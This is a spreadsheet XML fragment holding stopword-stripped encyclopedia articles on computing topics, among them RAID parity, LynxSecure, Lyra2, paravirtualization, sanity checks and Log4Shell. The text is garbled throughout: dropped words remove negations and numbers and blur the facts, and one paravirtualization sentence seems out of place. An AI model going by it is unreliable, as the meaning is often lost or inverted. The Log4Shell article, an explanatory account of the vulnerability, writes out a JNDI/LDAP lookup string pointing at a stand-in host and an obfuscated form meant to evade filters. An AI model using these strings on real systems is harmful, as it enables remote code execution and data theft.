remaining drives, drive drive follows: result calculation yields drive contents. 11010100 stored drive fully repairing array. logic also equivalent even parity (because treated xor(a,b,c,...) n-ary operator true number arguments true). concept applies similarly larger raid arrays parity, using number disks. case raid array drives, drives participate calculation shown yield value stored dedicated parity drive. extensions variations parity mechanism "double," "dual," "diagonal" parity, used raid-dp. history parity track present first magnetic tape data storage 1951. parity form, applied across multiple parallel signals, known transverse redundancy check. this combined parity computed multiple bits sent single signal, longitudinal redundancy check. parallel bus, longitudinal redundancy check parallel signal. parity also used least paper-tape (punched tape) data entry systems (which preceded magnetic tape systems). systems sold british company (formerly ict) 1-inch-wide paper tape hole positions running across parity. positions used data, e.g., 7-bit ascii. position hole punched depending number data holes punched. also bip-8 parity function single-event upset 8-n-1 check digit references external links different methods generating parity bit, among operations</t>
  </si>
  <si>
    <t>LynxSecure</t>
  </si>
  <si>
    <t>lynxsecure least privilege real-time separation kernel hypervisor lynx software technologies designed safety security critical applications found military, avionic, industrial, automotive markets. overview leveraging multi-core hardware virtualization features smaller microkernel small 15kb), lynxsecure primarily targeted raise assurance systems perform critical computing functions regulated environments. common cases include; separating critical apps internet domains, isolating security functions application domains, verifying filtering inter-domain communication. lynxsecure lives underneath applications operating systems, runs completely transparent cannot tampered with. software embedded broad class devices embedded platforms. stripped-down design aims raise assurance host removing possibility privilege escalation provide extremely tight control scheduling. rather attempting shape system behavior indirectly issuing commands platform apis according programming manual, lynxsecure allows developers directly control system behavior unique system architecture specification written developer enforced solely processor. with traditional architecture, hardware resources owned real-time operating system (rtos). this controls cores, memory, peripherals. applications must request access resources apis like fork(), malloc(), write(). rtos monolithic collection libraries manages task scheduling, memory partitioning, device i/o. this large block code needs safety certified free secure. separation kernel relies hardware virtualization functionality heavy lifting. this creates efficient, tamper-proof, non-bypassable virtual machines. hardware resources robustly partitioned almost zero overhead populated oses, rtoses, bare-metal applications. mixed criticality safety systems constructed minimize high design assurance levels (dal) source lines code (sloc) counts reduce certification costs technical risks future programs. lynxsecure supports paravirtualized linux lynxos real-time operating systems, well full virtualization windows operating system. also announced 2020 lynxsecure would support freertos, market share leader real-time operating systems, guest lynxsecure built conform mils (multiple independent levels security) architecture virtualization used embedded systems requirements high assurance. also designed satisfy real-time, high assurance computing requirements used regulate military industrial computing environments, nist, common criteria, nerc cip. default, lynxsecure uses arinc 653-based fixed-cyclic scheduler manage processing time, dynamic priority scheduling policies also permitted. additional features designed support eal-7 do-178 time-space partitioned supports multiple heterogeneous operating system environments physical hardware including intel supports symmetric multiprocessing (smp) 64-bit addressing high-end scalability 100% binary compatibility linux, posix-based applications mils architecture conformance multithreaded small-footprint run-time environment secure application development multiprocess, multithreaded environment virtualized hat, linux, lynxos lynxos oses microsoft windows support full virtualization mode updates releases lynxsecure 2.0, released 2008, featuring multiprocessing; support posix, linux abi, arinc; device assignment capabilities allows devices assigned specific guest operating systems; configuration tool platform configuration security policy definition. lynxsecure released 2009 ability fully virtualized guest operating systems simultaneously hardware para-virtualized real-time operating systems running secure partition. building lynxsecure 2.0, lynxsecure added full virtualization, meaning guest operating systems unmodified lynxsecure. other features lynxsecure included addition para-virtualized 64-bit linux guest security enhancements supporting audit built-in tests flexible scheduling enhanced bootloader. lynxsecure added support intel core processor families enabled configurations guest operating systems well updated version (4.7) luminosity integrated development environment (ide).lynxsecure included changes increased performance fully virtualized guest operating systems added 64-bit symmetric multi-processing (smp) guest virtualization support. additionally, device-sharing facility systems limited physical devices added complemented existing direct device assignment mechanism available previous versions lynxsecure. implementing secure device virtualization mechanism, managed secure partition lynxsecure, limited physical devices could virtualized shared guest oses.lynxsecure brought lynxsecure arm® architecture first time. initial port available xilinx zynq ultrascale+ mpsoc displayed techcon. references</t>
  </si>
  <si>
    <t>Lyra2</t>
  </si>
  <si>
    <t>lyra2 password hashing scheme (phs) also work derivation function (kdf). received special recognition password hashing competition july 2015., argon2. besides used original purposes, also core proof-of-work algorithms lyra2rev2, adopted vertcoin, monacoin, among cryptocurrencies lyra2 designed marcos simplicio jr., leonardo almeida, ewerton andrade, paulo santos, paulo barreto escola politécnica universidade paulo. improvement lyra, previously proposed authors. lyra2 preserves security, efficiency flexibility predecessor, including: ability configure desired amount memory, processing time parallelism used algorithm; capacity providing high memory usage processing time similar obtained scrypt. addition, brings following improvements compared predecessor: allows higher security level attack venues involving time-memory trade-offs allows legitimate users benefit effectively parallelism capabilities platforms includes tweaks increasing costs involved construction dedicated hardware attack algorithm balances resistance side-channel threats attacks relying cheaper (and, hence, slower) storage devices lyra2 released public domain, provides main extensions: lyra2-δ, gives user better control algorithm's bandwidth usage lyra2p, takes advantage parallelism capabilities legitimate user's platformthis algorithm enables parameterization terms execution time (time cost {\displaystyle memory required (number rows {\displaystyle number columns {\displaystyle degree parallelism (number threads {\displaystyle underlying permutation function (can seen main cryptographic primitive) number blocks used underlying permutation function (bitrate) number rounds performed underlying permutation function {\displaystyle \rho number bits used rotations {\displaystyle \omega output length {\displaystyle \kappa strengths main strengths algorithm are: high resistance processing-memory tradeoffs: estimated processing costs attacks memory usage involve factor grows exponentially time cost recomputations memory time costs decoupled, allowing resources' usage fine-tuned fast reduced-round sponge function algorithm's core provide outputs desired length, behaving derivation function (kdf) design combines resistance side-channel attacks (during whole setup phase) attacks involving cheap (hence, low-speed) memory devices, aiming balance conflicting requirements considers wide range configurations protecting attacking platforms optimizing execution legitimate platform, support parallelism, multi-core platforms, without giving much advantage gpu-based attacks capability using different underlying sponge functions depending target platform (e.g., blake2b software implementations; keccak hardware implementations; blamka additional resistance hardware platforms; etc.) ability raise algorithm's memory bandwidth usage (note: original specification expected bandwidth current machines, feature useful future hardware) design phs, lyra2 takes input salt password, creating pseudorandom output used material cryptographic algorithms authentication string.internally, scheme's memory organized matrix expected remain memory whole password hashing process: since cells iteratively read written, discarding cell saving memory leads need recomputing whenever accessed again, point last modified.the construction visitation matrix done using stateful combination absorbing, squeezing duplexing operations underlying sponge (i.e., internal state never reset zero), ensuring sequential nature whole process. also, number times matrix's cells revisited initialization defined user, allowing lyra2's execution time fine-tuned according target platform's resources. functions/symbols concatenate strings bitwise wordwise operation (i.e., ignoring carries words) modulus target machine's word size (usually, omega number bits used rotations (recommended: multiple machine's word size, right rotation number rounds reduced squeeze duplexing operations blen sponge's block size bytes sponge block size blen bytes) underlying permutation h.absorb(input) sponge's absorb operation input h.squeeze(len) sponge's squeeze operation bytes h.squeeze_{rho}(len) sponge's squeeze operation bytes using rounds h.duplexing(input,len) sponge's duplexing operation input, producing bytes h.duplexing_{rho}(input,len) sponge's duplexing operation input, using rounds producing bytes pad(string) pads string multiple blen bytes (padding rule: 10*1) lsw(input) least significant word input len(string) length string, bytes syncthreads() synchronize parallel threads swap(input1,input2) swap value inputs number columns memory matrix (usually, 128, 256, 1024) degree parallelism (m_cost/2) inputs password salt t_cost m_cost outlen algorithm without parallelism bootstrapping phase: initializes sponge's state local variables byte representation input parameters (others added) params outlen len(password) len(salt) t_cost m_cost initializes sponge's state (after that, password overwritten) h.absorb( pad(password salt params) initializes visitation step, window first rows feed sqrt prev0 row1 prev1 setup phase: initializes (m_cost memory matrix, cells blen-byte cells initializes m[0], m[1] m[2] m[0][c-1-col] h.squeeze_{rho}(blen) m[1][c-1-col] h.duplexing_{rho}( m[0][col], blen) m[2][c-1-col] h.duplexing_{rho}( m[1][col], blen) filling loop: initializes remainder rows row0 m_cost-1 columns loop: m[row0] initialized m[row1] updated rand h.duplexing_{rho}( m[row1][col] m[prev0][col] m[prev1][col], blen) m[row0][c-1-col] m[prev0][col] rand m[row1][col] m[row1][col] rand omega rows revisited next loop prev0 row0 prev1 row1 row1 (row1 stp) window fully revisited (row1 doubles window adjusts step sqrt -gap doubles sqrt every iteration (gap sqrt sqrt wandering phase: iteratively overwrites pseudorandom cells memory matrix visitation loop: m_cost t_cost) rows revisited pseudorandom fashion wcount (m_cost t_cost) picks pseudorandom rows row0 lsw(rand) m_cost row1 lsw( rand omega m_cost columns loop: updates m[row0] m[row1] picks pseudorandom columns col0 lsw( rand omega omega col1 lsw( rand omega omega omega rand h.duplexing_{rho}( m[row0][col] m[row1][col] m[prev0][col0] m[prev1][col1], blen) m[row0][col] m[row0][col] rand m[row1][col] m[row1][col] rand omega next iteration revisits recently updated rows prev0 row0 prev1 row1 wrap-up phase: output computation absorbs final column full-round sponge h.absorb( m[row0][0] squeezes outlen bits full-round sponge output h.squeeze(outlen) provides outlen-long bitstring output return output algorithm parallelism [0..p] bootstrapping phase: initializes sponge's state local variables byte representation input parameters (others added) params outlen len(password) len(salt) t_cost m_cost initializes sponge's state (after that, password overwritten) h_i.absorb( pad(password salt params) initializes visitation step, window first rows feed sqrt sync prev0 rowp prevp setup phase: initializes (m_cost memory matrix, cells blen-byte cells initializes m_i[0], m_i[1] m_i[2] m_i[0][c-1-col] h_i.squeeze_{rho}(blen) m_i[1][c-1-col] h_i.duplexing_{rho}( m_i[0][col], blen) m_i[2][c-1-col] h_i.duplexing_{rho}( m_i[1][col], blen) filling loop: initializes remainder rows row0 (m_cost columns loop: m_i[row0] initialized m_j[row1] updated rand h_i.duplexing_{rho}( m_j[rowp][col] m_i[prev0][col] m_j[prevp][col], blen) m_i[row0][c-1-col] m_i[prev0][col] rand m_j[rowp][col] m_j[rowp][col] rand omega rows revisited next loop prev0 row0 prevp rowp rowp (rowp stp) window fully revisited (rowp doubles window adjusts step sqrt -gap doubles sqrt every iteration (gap sqrt sqrt synchronize point (row0 sync) sync sync (sqrt syncthreads() syncthreads() wandering phase: iteratively overwrites pseudorandom cells memory matrix m_cost sync sqrt off0 offp visitation loop: m_cost t_cost rows revisited pseudorandom fashion wcount (m_cost t_cost) picks pseudorandom rows slices row0 off0 (lsw(rand) wnd) rowp offp (lsw( rand omega wnd) lsw( rand omega omega columns loop: update m_i[row0] picks pseudorandom column col0 lsw( rand omega omega omega rand h_i.duplexing_{rho}( m_i[row0][col] m_i[prev0][col0] m_j[rowp][col], blen) m_i[row0][col] m_i[row0][col] rand next iteration revisits recently updated rows prev0 row0 synchronize point (wcount sync) sync sync sqrt swap(off0,offp) syncthreads() syncthreads() wrap-up phase: output computation absorbs final column full-round sponge h_i.absorb( m_i[row0][0] squeezes outlen bits full-round sponge output_i h_i.squeeze(outlen) provides outlen-long bitstring output return output_0 output_{p-1} security analysis against lyra2, processing cost attacks using {\displaystyle 1/2^{n+2}} amount memory employed legitimate user expected {\displaystyle o(2^{2nt}r^{3})} {\displaystyle o(2^{2nt}r^{n+2})} latter better estimate {\displaystyle n\gg instead {\displaystyle o(r)} achieved amount memory {\displaystyle o(r)} {\displaystyle user-defined parameter define processing time. this compares well scrypt, displays cost {\displaystyle o(r^{2})} memory usage {\displaystyle o(1)} solutions literature, results usually {\displaystyle o(r^{t+1})} .nonetheless, practice solutions usually involve value {\displaystyle (memory usage) lower attained lyra2 processing time. performance processing time obtained single-core implementation lyra2 illustrated hereby shown figure. this figure extracted from, similar third-party benchmarks performed context.the results depicted correspond average execution time lyra2 configured {\displaystyle c=256} {\displaystyle \rho {\displaystyle b=768} bits (i.e., inner state bits), different {\displaystyle {\displaystyle settings, giving overall idea possible combinations parameters corresponding usage resources. shown figure, lyra2 able execute less using (with {\displaystyle r=2^{14}} {\displaystyle t=5} memory (with {\displaystyle r\approx 4.2\cdot 10^{4}} {\displaystyle t=1} less (with {\displaystyle r=2^{16}} {\displaystyle t=6} tests performed intel xeon e5-2430 (2.20 cores, bits) equipped dram, running ubuntu 14.04 bits, source code compiled using 4.9.2. references external links lyra2's website lyra2 source code repository github</t>
  </si>
  <si>
    <t>SamyGO</t>
  </si>
  <si>
    <t>samygo project publishing aftermarket firmware smart samsung. consists forum contains various methods rooting smart tvs. features project implemented samba file sharing, playback devices unlocked wi-fi dongles authorized samsung. references external links official website</t>
  </si>
  <si>
    <t>M0n0wall</t>
  </si>
  <si>
    <t>m0n0wall embedded firewall distribution freebsd, operating system descendants. provides small image compact flash cards well cd-roms hard disks. runs number embedded platforms generic pcs. version live floppy disk store configuration data, single compact flash card (with adapter). this eliminates need hard drive, reduces noise heat levels. february 2015 manuel kasper announced "m0n0wall project officially ended. development done anymore, releases," encouraging "all current m0n0wall users check opnsense contribute can." features m0n0wall provides web-based configuration uses exclusively bootup configuration. additionally, adopts single file configuration parameters. some functions m0n0wall are: stateful packet filter firewall ipsec pptp vpns inbound outbound network address translation captive portal traffic shaper inbound outbound port filtering support 802.1q compatible vlans multiple addresses ports hardware m0n0wall installed embedded hardware designed manufactured companies. derivatives similar hardware requirements t1n1wall: 2015 fork m0n0wall discontinued. smallwall: another 2015 fork m0n0wall end-of-life, activity since 2016. m0n0wall mod: original m0n0wall additional features (dhcp+pptp, dhcp+pppoe, static+pppoe, l2tp, interface), activity since 2013.extended hardware requirements opnsense: forked pfsense 2015. pfsense: forked m0n0wall project 2004, first released 2006.other usages (not firewall) askoziapbx: embedded telephone system. xigmanas: network-attached storage distro using freebsd, uses portions m0n0wall gui. formerly nas4free. also comparison firewalls list router firewall distributions references external links official website m0n0wall central management interface project sourceforge</t>
  </si>
  <si>
    <t>M6 (cipher)</t>
  </si>
  <si>
    <t>cryptography, block cipher proposed hitachi 1997 ieee 1394 firewire standard. design allows freedom choosing cipher's operations, considered family ciphers. export controls, fully published; nevertheless, partial description algorithm based draft standard given kelsey, cryptanalysis family ciphers.the algorithm operates blocks bits using 10-round feistel network structure. size bits default, bits. schedule simple, producing 32-bit subkeys: high bits key, bits. because round function based rotation addition, first ciphers attacked cryptanalysis. known plaintexts suffice distinguish output pseudorandom permutation. 257, information secret revealed. known plaintext reduces complexity brute force attack trial encryptions; dozen" known plaintexts lowers number 231. simple schedule, also vulnerable slide attack, requires known plaintext less computation. references</t>
  </si>
  <si>
    <t>Paravirtualization</t>
  </si>
  <si>
    <t>computing, paravirtualization para-virtualization virtualization technique presents software interface virtual machines similar, identical, underlying hardware–software interface. intent modified interface reduce portion guest's execution time spent performing operations substantially difficult virtual environment compared non-virtualized environment. paravirtualization provides specially defined 'hooks' allow guest(s) host request acknowledge tasks, would otherwise executed virtual domain (where execution performance worse). successful paravirtualized platform allow virtual machine monitor (vmm) simpler relocating execution critical tasks virtual domain host domain), and/or reduce overall performance degradation machine execution inside virtual guest. paravirtualization requires guest operating system explicitly ported para-api conventional distribution paravirtualization-aware cannot paravirtualizing vmm. however, even cases operating system cannot modified, components available enable many significant performance advantages paravirtualization. example, windows gplpv project provides paravirtualization-aware device drivers, licensed terms gpl, intended installed microsoft windows virtual guest running hypervisor. such applications tend accessible paravirtual machine interface environment. this ensures run-mode compatibility across multiple encryption algorithm models, allowing seamless integration within paravirtual framework. history paravirtualization term idea. ibm's operating system offered facility since 1972 (and earlier cp-67). world, designated "diagnose code", uses instruction code used normally hardware maintenance software thus undefined. parallels workstation operating system calls equivalent "hypercall". thing: system call hypervisor below. such calls require support "guest" operating system, hypervisor-specific code make calls. term "paravirtualization" first used research literature association denali virtual machine manager. term also used describe xen, trango, vmware, wind river xtratum hypervisors. projects paravirtualization techniques support high performance virtual machines hardware implementing virtual machine implement hard-to-virtualize parts actual instruction set.a hypervisor provides virtualization underlying computer system. full virtualization, guest operating system runs unmodified hypervisor. however, improved performance efficiency achieved guest operating system communicate hypervisor. allowing guest operating system indicate intent hypervisor, cooperate obtain better performance running virtual machine. this type communication referred paravirtualization. 2005, vmware proposed paravirtualization interface, virtual machine interface (vmi), communication mechanism guest operating system hypervisor. this interface enabled transparent paravirtualization single binary version operating system either native hardware hypervisor paravirtualized mode. intel cpus added support efficient hardware-assisted virtualization, standard became obsoleted support removed linux kernel 2.6.37 vmware products 2011.in 2008, announced virtio paravirtualization linux, virtio driver microsoft windows also available. 2008, microsoft announced hyper-v paravirtualization. linux paravirtualization support usenix conference 2006 boston, massachusetts, number linux development vendors (including ibm, vmware, xen, hat) collaborated alternative form paravirtualization, initially developed group, called "paravirt-ops". paravirt-ops code (often shortened pv-ops) included mainline linux kernel 2.6.23 version, provides hypervisor-agnostic interface hypervisor guest kernels. distribution support pv-ops guest kernels appeared starting ubuntu 7.04 redhat hypervisors based 2.6.24 later kernel support pv-ops guests, vmware's workstation product beginning version 6.virtualbox also supports version 5.0. also operating system-level virtualization exokernel logical domains (ldom) logical partition (lpar) hypervisor references external links anandtech hardware virtualization: nuts bolts technical article paravirtualization</t>
  </si>
  <si>
    <t>Parity drive</t>
  </si>
  <si>
    <t>parity drive hard drive used raid array provide fault tolerance. example, raid uses parity drive create system fault tolerant and, data striping, fast. basically, single data added data block ensure number bits message either even.one implement parity drive raid array exclusive xor, function. boolean logic function means 'one other, both'. data drives raid array written parity drive. data drives fails, remaining drives identical data lost drive. therefore, drive lost, recovering drive simple copying remaining drives fresh data drive. references</t>
  </si>
  <si>
    <t>List of backup software</t>
  </si>
  <si>
    <t>this list notable backup software performs data backups. archivers, transfer protocols, version control systems often used backups software focused backup listed here. comparison backup software features. free open-source software commercial closed-source software defunct software also comparison file synchronization software comparison online backup services data recovery file synchronization list data recovery software remote backup service tape management system notes references</t>
  </si>
  <si>
    <t>Lp0 on fire</t>
  </si>
  <si>
    <t>fire (also known printer fire) outdated error message generated unix unix-like computer operating systems response certain types printer errors. unix device handle first line printer, error displayed printer attached unix linux system. indicates printer error requires investigation diagnose, necessarily fire. printer flammability late 1950s, high speed computerized printing still somewhat experimental field. first documented fire-starting printer stromberg-carlson 5000 xerographic printer (similar modern laser printer, light source instead laser), installed around 1959 lawrence livermore national laboratory modified extended fusing oven achieve print speed page second. event printing stall, occasionally normal operation, fusing oven would heat paper combustion. this fire risk aggravated fact printer continued operate, would essentially stoke fire fresh paper high speed. however evidence "lp0 fire" message appearing software time.as technology matured, large printer installations drum printers, type impact printer could print entire line text high speed rotary printing drum. thought event severe jam, friction paper drum could ignite either paper itself, dirty machine, accumulated paper dust mechanism. whether ever happened known; reports friction-related printer fires. line printer employed series status codes, specifically ready, online, check. online status "off" check status "on," operating system would interpret printer running paper. however, online code "on" check code also "on", meant printer still paper, suffering error (and still attempting run). potentially hazardous conditions could arise early line printers, unix displayed message fire" motivate system operator viewing message check line printer immediately.in early 1980s, xerox created prototype laser printer engine provided units various computer companies. fuse toner, paper path passed glowing wire. paper jammed anywhere path, sheet fuser caught fire. prototype unix driver reported paper jams fire." later print engine models used drum place wire. phrase origins michael johnson ("mkj" fedora fame) wrote first linux version error message 1992, however well herbert rosmanith alan (all linux developers) acknowledged phrase existed unix different forms prior linux printer implementation.since then, printer code spread across sorts posix-compliant operating systems, often still retain legacy message. modern printer drivers support improved hidden low-level error messages users, unix/linux users today never seen fire" message. however, people still today varying levels amusement confusion. fire" message remains linux source code version 5.8.16.the message also present software modules, often humorous effect. example, kernels' code, thermal failure could result message "cpu#0: possible thermal failure (cpu fire similar humor found phrase halt catch fire. also halt catch fire http typewriter load letter references</t>
  </si>
  <si>
    <t>Sanity check</t>
  </si>
  <si>
    <t>sanity check sanity test basic test quickly evaluate whether claim result calculation possibly true. simple check produced material rational (that material's creator thinking rationally, applying sanity). point sanity test rule certain classes obviously false results, catch every possible error. rule-of-thumb back-of-the-envelope calculation checked perform test. advantage performing initial sanity test speedily evaluating basic function. arithmetic, example, multiplying using divisibility rule verify digits result divisible sanity test—it catch every multiplication error, however quick simple method discover many possible errors. computer science, sanity test brief run-through functionality computer programme, system, calculation, analysis, assure part system methodology works roughly expected. this often prior exhaustive round testing. mathematical sanity test refer various orders magnitude simple rule-of-thumb devices applied cross-check mathematical calculations. example: attempt square calculated 54,464, quick sanity check could show result cannot true. consider 738, 7002 1002 490,000 54,464. since squaring positive integers preserves inequality, result cannot true, calculated result incorrect. correct answer, 7382 544,644, times higher 54,464. multiplication, 142,135 since divisible three 142,135 (digits multiple three). also, product must digit product end-digits: 142,135 like "40", correct answer does: 142,290. even quicker check product even numbers even, whereas 142,135 odd. physical power output cannot since unit joules measure energy, power (energy unit time). this basic application dimensional analysis. when determining physical properties, comparing known similar substances often yield insight whether result reasonable. instance, metals sink water, density metals greater water (~1000 kg/m3). fermi estimates often provide insight order magnitude expected value. software development software development, sanity test form software testing offers "quick, broad, shallow testing") evaluates result subset application functionality determine whether possible reasonable proceed testing entire application. sanity tests sometimes used interchangeably smoke tests insofar terms denote tests determine whether possible reasonable continue testing further. hand, distinction sometimes made smoke test non-exhaustive test ascertains whether crucial functions programme work proceeding testing whereas sanity test refers whether specific functionality particular works expected without testing wider functionality software. words, sanity test determines whether intended result code change works correctly smoke test ensures nothing else important broken process. sanity testing smoke testing avoid wasting time effort quickly determining whether application flawed merit rigorous testing, needs developer debugging. groups sanity tests often bundled together automated unit testing functions, libraries, applications prior merging development code testing trunk version control branch, automated building, continuous integration continuous deployment.another common usage sanity test denote checks performed within programme code, usually arguments functions returns therefrom, answers assumed correct. complicated routine, important response checked. trivial case checking whether return value function indicated success failure therefore cease processing upon failure. this return value actually often result sanity check. example, function attempted open, write close file, sanity check used ensure fail actions—which sanity check often ignored programmers.these kinds sanity checks used development debugging purposes also troubleshooting software runtime errors. example, bank account management application, sanity check fail withdrawal requests money total account balance rather allowing account negative (which sane). another sanity test might deposits purchases correspond patterns established historical data—for example, large purchase transactions withdrawals foreign locations never visited card holder flagged confirmation. sanity checks also performed upon installation stable, production software code computing environment ensure dependencies met, compatible operating system link libraries. when computing environment passed sanity checks, known sane environment installation programme proceed reasonable expectation success. "hello, world!" program often used sanity test development environment similar fashion. rather complicated script running unit tests, simple programme fails compile execute, proves supporting environment likely configuration problem prevent code compiling executing. "hello world" executes, problems experienced programmes likely attributed errors application's code rather environment. also certifying algorithm checksum fermi problem mental calculation proof concept references</t>
  </si>
  <si>
    <t>Log4Shell</t>
  </si>
  <si>
    <t>log4shell (cve-2021-44228) zero-day vulnerability log4j, popular java logging framework, involving arbitrary code execution. vulnerability existed unnoticed since 2013 privately disclosed apache software foundation, log4j project, chen zhaojun alibaba cloud's security team november 2021. before official identifier made available december 10th, 2021, vulnerability circulated name "log4shell", given free wortley lunasec team, initially used track issue online. apache gave log4shell cvss severity rating highest available score. exploit simple execute estimated affect hundreds millions devices.the vulnerability takes advantage log4j's allowing requests arbitrary ldap jndi servers, allowing attackers execute arbitrary java code server computer, leak sensitive information. list affected software projects published apache security team. affected commercial services include amazon services, cloudflare, icloud, minecraft: java edition, steam, tencent many others. according vulnerability affected enterprise cloud environments.the vulnerability's disclosure received strong reactions cybersecurity experts. cybersecurity company tenable said exploit "the single biggest, critical vulnerability ever", technica called "arguably severe vulnerability ever" washington post said descriptions security professionals "border apocalyptic". background log4j open-source logging framework allows software developers data within applications. this data include user input. used ubiquitously java applications, especially enterprise software. originally written 2001 ceki gülcü, part apache logging services, project apache software foundation. kellermann, member president obama's commission cyber security, described apache "one giant supports bridge facilitates connective tissue worlds applications computer environments". behavior java naming directory interface (jndi) allows lookup java objects program runtime given path data. jndi leverage several directory interfaces, providing different scheme looking files. among interfaces lightweight directory access protocol (ldap), non-java-specific protocol retrieves object data appropriate server, either local anywhere internet.in default configuration, logging string, log4j performs string substitution expressions form ${prefix:name}. example, text: ${java:version} might converted text: java version 1.7.0_67. among recognized expressions ${jndi:&lt;lookup&gt;}; specifying lookup ldap, arbitrary queried loaded java object data. ${jndi:ldap://example.com/file}, example, load data connected internet. inputting string logged, attacker load execute malicious code hosted public url. even execution data disabled, attacker still retrieve data—such secret environment variables—by placing url, case substituted sent attacker's server. besides ldap, potentially exploitable jndi lookup protocols include secure variant ldaps, java remote method invocation (rmi), domain name system (dns), internet inter-orb protocol (iiop).because http requests frequently logged, common attack vector placing malicious string http request commonly logged http header, user-agent. early mitigations included blocking requests containing potentially malicious contents, ${jndi. naive searches circumvented obfuscating request: ${${lower:j}ndi, example, converted jndi lookup performing lowercase operation letter even input, first name, immediately logged, later logged internal processing contents executed. mitigation fixes vulnerability released december 2021, three days vulnerability published, log4j version 2.15.0-rc1. included restricting servers protocols used lookups. researchers discovered related bug, cve-2021-45046, allows local remote code execution certain non-default configurations fixed version 2.16.0, disabled features using jndi support message lookups. vulnerabilities library found: denial-of-service attack, tracked cve-2021-45105 fixed 2.17.0; difficult-to-exploit remote code execution vulnerability, tracked cve-2021-44832 fixed 2.17.1. previous versions, class org.apache.logging.log4j.core.lookup.jndilookup needs removed classpath mitigate vulnerabilities. early recommended older versions system property log4j2.formatmsgnolookups true, change prevent exploitation cve-2021-45046 later found disable message lookups certain cases.newer versions java runtime environment (jre) also mitigate vulnerability blocking remote code loaded default, although attack vectors still exist certain applications. several methods tools published help detect vulnerable log4j versions used built java packages. usage exploit allows hackers gain control vulnerable devices using java. some hackers employ vulnerability victims' devices cryptocurrency mining, creating botnets, sending spam, establishing backdoors illegal activities ransomware attacks. days following vulnerability's disclosure, check point observed millions attacks initiated hackers, researchers observing rate hundred attacks minute ultimately resulted attempted attacks business networks internationally.according cloudflare matthew prince, evidence usage testing exploit goes back early december, nine days publicly disclosed. according cybersecurity firm greynoise, several addresses scraping websites check servers vulnerability. several botnets began scanning vulnerability, including muhstik botnet december, well mirai, tsunami xmrig. ransomware group conti observed using vulnerability december.some state-sponsored groups china iran also utilized exploit according check point, known exploit used israel, russia united states prior disclosure vulnerability. check point said december 2021, iran-backed hackers attempted infiltrate networks israeli businesses government institutions. response impact governmental united states, director cybersecurity infrastructure security agency (cisa), easterly, described exploit "one serious i've seen entire career, serious", explaining hundreds millions devices affected advising vendors prioritize software updates. civilian agencies contracted united states government december 2021 patch vulnerabilities. january, federal trade commission (ftc) stated intent pursue companies fail take reasonable steps update used log4j software. white house meeting, importance security maintenance open-source software often also carried largely volunteers national security clarified. while open-source projects many eyes them, others many people ensuring security.germany's bundesamt sicherheit informationstechnik (bsi) designated exploit agency's highest threat level, calling "extremely critical threat situation" (translated). also reported several attacks already successful extent exploit remained hard assess. netherlands's national cyber security centre (ncsc) began ongoing list vulnerable applications.the canadian centre cyber security (cccs) called organizations take immediate action. canada revenue agency temporarily shut online services learning exploit, government quebec closed almost 4,000 websites "preventative measure." belgian ministry defence experienced breach attempt forced shut part network.the chinese ministry industry information technology suspended work alibaba cloud cybersecurity threat intelligence partner months failing report vulnerability government first. businesses research conducted showed cloud enterprise environment vulnerable log4shell. vulnerable workloads exposed internet prone wide exploitation attempts. according research, days vulnerability disclosure december 2021) vulnerable workloads patched average cloud environments. amazon, google microsoft cloud data affected log4shell. microsoft asked windows azure customers remain vigilant observing state-sponsored cyber-criminal attackers probing systems log4j 'log4shell' flaw december 2021.the human resource management workforce management company ukg, largest businesses industry, targeted ransomware attack affected large businesses. said evidence log4shell exploited incident, though analyst allan liska cybersecurity company recorded future said possibly connection.as larger companies began release patches exploit, risk small businesses increased hackers focused vulnerable targets. privacy some personal devices connected internet, smart security cameras, vulnerable exploit. some software never patch discontinued manufacturer support. analysis december 2021, almost half corporate networks globally actively probed, variants exploit produced within hours. check point software technologies detailed analysis described situation true cyber-pandemic" characterizing potential damage "incalculable". several initial advisories exaggerated amount packages vulnerable, leading false positives. most notably, "log4j-api" package marked vulnerable, reality research showed main "log4j-core" package vulnerable. this confirmed original issue thread external security researchers.technology magazine wired wrote despite previous "hype" surrounding multiple vulnerabilities, "the log4j vulnerability lives hype host reasons". magazine explains pervasiveness log4j, vulnerability difficult detect potential targets ease transmitting code victims created "combination severity, simplicity, pervasiveness security community rattled". wired also outlined stages hackers using log4shell; cryptomining groups first using vulnerability, data brokers selling "foothold" cybercriminals, finally engage ransomware attacks, espionage destroying data.amit yoran, tenable founding director united states computer emergency readiness team, stated "[log4shell] single biggest, critical vulnerability ever", noting sophisticated attacks beginning shortly bug, saying "we're also already seeing leveraged ransomware attacks, which, again, major alarm bell we've also seen reports attackers using log4shell destroy systems without even looking collect ransom, fairly unusual behavior". sophos's senior threat researcher sean gallagher said, "honestly, biggest threat people already gotten access sitting even remediate problem somebody's already network it's going around long internet."according bloomberg news report, anger directed apache's developers failure vulnerability warnings exploits broad classes software, including log4j, made 2016 cybersecurity conference. references external links log4j website ncsc overview log4shell github common vulnerabilities exposures page national vulnerabilities database page projects affected cve-2021-44228, apache security team</t>
  </si>
  <si>
    <t>Partition-Saving</t>
  </si>
  <si>
    <t>partition-saving disk cloning utility linux, windows environments. partition-saving save partitions many formats disk image. also often referenced savepart (its original name modified enter conflict os/2 utility). common uses some common uses partition-saving follows: backup individual disk partitions. volume backups useful recovery case disk failure data corruption correction boot parameters boot sector content windows boot configuration features partition-saving following features: backup partition types (sector sector) backup fat12, fat16, fat32, ext2, ext3, ext4 (not options), ntfs partitions occupied sectors (not file file backup, similar size keeping disk organization) backup master boot record, partition table (both format), boot sector content superblock compression data saving partition case partition disk) mount backup file extract files modification windows registry force partition drive letter modification filesystem content: boot sector, windows multi-boot boot sector, windows boot configuration, boot sector superblock backup, clusters listit used either command line, text based batch processing mode. limitations partition-saving following limitations: backup running possible (less dos): means needs boot another live freedos provided) backup linux windows system partition when full backup performed, restoration done partition size place disk. chunauti -force option workaround this, correction done partition content reflect incompatibility boot sector content) when occupied sectors saved, restoration done partition different size limitations size creating backup files ntfs drive (and linux linux know write ntfs drive) available, modifying existing file used. need create dummy files windows, perform backup also list disk cloning software references external links official website</t>
  </si>
  <si>
    <t>Partimage</t>
  </si>
  <si>
